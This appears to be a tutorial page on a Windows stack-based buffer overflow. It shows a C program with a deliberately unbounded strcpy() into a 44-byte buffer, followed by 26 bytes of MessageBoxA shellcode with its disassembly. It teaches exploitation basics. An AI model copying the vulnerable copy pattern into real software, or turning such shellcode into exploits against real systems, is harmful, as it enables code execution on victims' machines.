Windows 栈溢出 — stack-based buffer overflow demo: an unbounded strcpy() into a 44-byte stack buffer is used to run MessageBoxA shellcode read from a file


#include <stdio.h>
#include <windows.h>

#define PASSWORD "1234567"

/*
 * Deliberately vulnerable password check used by the overflow demo.
 *
 * password: NUL-terminated string that main() read from password.txt.
 * Returns the strcmp() result against PASSWORD: 0 on match, non-zero otherwise.
 *
 * buff holds 44 bytes and strcpy() copies the whole input with no length
 * check, so any input longer than 43 characters writes past the end of buff
 * into the rest of this stack frame (typically the saved frame pointer and
 * the return address). The payload described on this page relies on that
 * exact frame layout, so the declaration order and the copy are kept as-is.
 * A non-demo version would use snprintf(buff, sizeof buff, "%s", password).
 */
int verify_password(char *password)
{
int ret;
char buff[44];
/* the comparison happens before the overflow, so ret reflects the real input */
ret = strcmp(password, PASSWORD);
/* unbounded copy: this is the stack-based buffer overflow */
strcpy(buff, password);

return ret;
}

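/*
 * Driver for the overflow demo: reads the payload from password.txt,
 * hands it to verify_password() and prints the verdict.
 *
 * Returns 0 after printing "pass"/"Failed", 1 if password.txt cannot be
 * opened or read (the original called exit(0) on open failure, which
 * reported success for a failed run).
 */
int main(void)
{
    char password[1024];
    FILE *fp;
    int flag;

    /* Make sure user32.dll is mapped: the shellcode in password.txt calls
     * MessageBoxA through a hard-coded absolute user32 address. */
    LoadLibrary("user32.dll");

    /* "rb": the original "rw+" is not a valid fopen() mode string, and
     * binary mode keeps the CRT's text-mode translation (CR/LF, Ctrl-Z
     * treated as EOF) from mangling the raw payload bytes. */
    fp = fopen("C://Users//CytQ//Desktop//password.txt", "rb");
    if (fp == NULL) {
        perror("password.txt");
        return 1;
    }

    /* %1023s bounds the read to the buffer (1023 chars + NUL); the overflow
     * under test is the 44-byte buffer in verify_password(), not this one,
     * so the demo still works. %s stops at the first whitespace byte, so the
     * payload must not contain 0x09/0x0A/0x0D/0x20. */
    if (fscanf(fp, "%1023s", password) != 1) {
        fputs("password.txt is empty or unreadable\n", stderr);
        fclose(fp);
        return 1;
    }
    fclose(fp);

    flag = verify_password(password);
    if (flag) {
        printf("Failed\n");
    } else {
        printf("pass\n");
    }

    return 0;
}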

PASSWORD.TXT: IN HEX

PASSWORD.TXT

Hex (26 bytes of x86 shellcode): 33 DB 53 68 C6 F4 DD 01 68 C6 F4 DD 01 8B C4 53 50 50 53 B8 AE FE 96 75 FF D0

Decoded:
33 DB             xor ebx, ebx        ; ebx = 0, used as NUL terminator, hWnd and uType
53                push ebx
68 C6 F4 DD 01    push 0x01DDF4C6
68 C6 F4 DD 01    push 0x01DDF4C6     ; 8 bytes of text followed by a NUL now sit on the stack
8B C4             mov eax, esp        ; eax points at that string
53 50 50 53       push ebx ; push eax ; push eax ; push ebx   ; stdcall, right-to-left: MessageBoxA(0, eax, eax, 0)
B8 AE FE 96 75    mov eax, 0x7596FEAE ; hard-coded absolute address of MessageBoxA
FF D0             call eax

Note: these 26 bytes are shorter than verify_password's 44-byte buff, so on their own they cannot overflow it; the padding and the return-address overwrite that redirect execution into the shellcode are not shown on this page. None of the bytes is 0x00 or ASCII whitespace, which matters because the file is read with fscanf("%s"), which stops at the first whitespace byte.

MessageBoxA in user32.dll, absolute address on the author's machine: 0x7596FEAE (this is the immediate in `B8 AE FE 96 75` above). It is hard-coded into the shellcode, so the payload only works while user32.dll is loaded at that same base; with ASLR the address changes and must be re-resolved for each target.

RESULT

And then the process crashes. This is expected: the shellcode ends with `call eax` and never calls ExitProcess, so when MessageBoxA returns, execution falls through into whatever bytes follow the payload on the stack.